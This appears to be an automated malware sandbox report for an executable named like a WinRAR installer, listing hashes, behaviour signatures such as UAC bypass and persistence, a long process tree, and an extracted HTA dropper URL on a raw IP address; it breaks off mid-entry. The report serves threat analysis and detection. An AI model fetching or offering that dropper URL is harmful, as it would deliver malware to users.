Resubmissions

11/02/2024, 20:27

240211-y8tnksdb78 10

11/02/2024, 20:21

240211-y5dg7abb61 6

11/02/2024, 20:11

240211-yymsaada97 6

11/02/2024, 20:06

240211-yvk5aaba9v 6

11/02/2024, 19:54

240211-ym1vrsda45 10

Analysis

  • max time kernel
    401s
  • max time network
    406s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2024, 20:27

Errors

Reason
Machine shutdown

General

  • Target

    winrar-x64-624es.exe

  • Size

    3.5MB

  • MD5

    1da8374156fc6492f06828e55ea4dc13

  • SHA1

    4923d045851434d65ce7c56b7e1bd73a08fc2305

  • SHA256

    c94ed445611ed35ebbe8c3c2af5c17e20cdb8ef76ecbc1ef535bdec7ccf08f4b

  • SHA512

    445392ffca842263310d0f4b8371e0bfd6bcb40d9e846d645c73616b252315b0603d7e538d9e5415028c35f747989da5c14566cf356860304e889ae7f12565d2

  • SSDEEP

    98304:jwBOBfKqQ0K1MTXtbysMqIpmCcBQz/J6+14CeZx1kR7:jw/qQv1MTXhysMs1BQnG1G

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=ncfxgriler

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets file execution options in registry 2 TTPs 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\winrar-x64-624es.exe
    "C:\Users\Admin\AppData\Local\Temp\winrar-x64-624es.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2248
  • C:\Windows\system32\werfault.exe
    werfault.exe /h /shared Global\2423a3293c1f491fbe733e28cb7b1ecd /t 384 /p 2248
    1⤵
      PID:1620
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1068
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6b8046f8,0x7ffd6b804708,0x7ffd6b804718
        2⤵
          PID:3328
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
          2⤵
            PID:1908
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1808
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
            2⤵
              PID:3356
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
              2⤵
                PID:2792
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                2⤵
                  PID:2872
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                  2⤵
                    PID:3476
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                    2⤵
                      PID:4008
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
                      2⤵
                        PID:1456
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4908
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                        2⤵
                          PID:2652
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
                          2⤵
                            PID:1968
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
                            2⤵
                              PID:4992
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
                              2⤵
                                PID:1148
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
                                2⤵
                                  PID:1328
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
                                  2⤵
                                    PID:4708
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
                                    2⤵
                                      PID:2552
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
                                      2⤵
                                        PID:1856
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
                                        2⤵
                                          PID:1636
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,6048750448855170805,1910730204629688592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                                          2⤵
                                            PID:4332
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:4324
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:2276
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                              1⤵
                                              • Enumerates system info in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:5032
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6b8046f8,0x7ffd6b804708,0x7ffd6b804718
                                                2⤵
                                                  PID:2124
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
                                                  2⤵
                                                    PID:1856
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4556
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
                                                    2⤵
                                                      PID:5052
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                                      2⤵
                                                        PID:1340
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                                                        2⤵
                                                          PID:3372
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
                                                          2⤵
                                                            PID:1476
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:1
                                                            2⤵
                                                              PID:3308
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:8
                                                              2⤵
                                                                PID:4036
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:8
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4796
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                2⤵
                                                                  PID:1440
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                                                                  2⤵
                                                                    PID:1496
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
                                                                    2⤵
                                                                      PID:4380
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                                                                      2⤵
                                                                        PID:1252
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                                                                        2⤵
                                                                          PID:1340
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5480 /prefetch:8
                                                                          2⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:900
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5296 /prefetch:8
                                                                          2⤵
                                                                            PID:852
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
                                                                            2⤵
                                                                              PID:1916
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                                                                              2⤵
                                                                                PID:1792
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                                                                                2⤵
                                                                                  PID:3256
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
                                                                                  2⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:900
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
                                                                                  2⤵
                                                                                    PID:3576
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,4196185835518577607,1224523456676154303,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5456 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4804
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2552
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:1568
                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                        1⤵
                                                                                          PID:4440
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                                                          1⤵
                                                                                          • Enumerates system info in registry
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:1108
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6b8046f8,0x7ffd6b804708,0x7ffd6b804718
                                                                                            2⤵
                                                                                              PID:1112
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
                                                                                              2⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:5072
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                                                                              2⤵
                                                                                                PID:3528
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1124
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
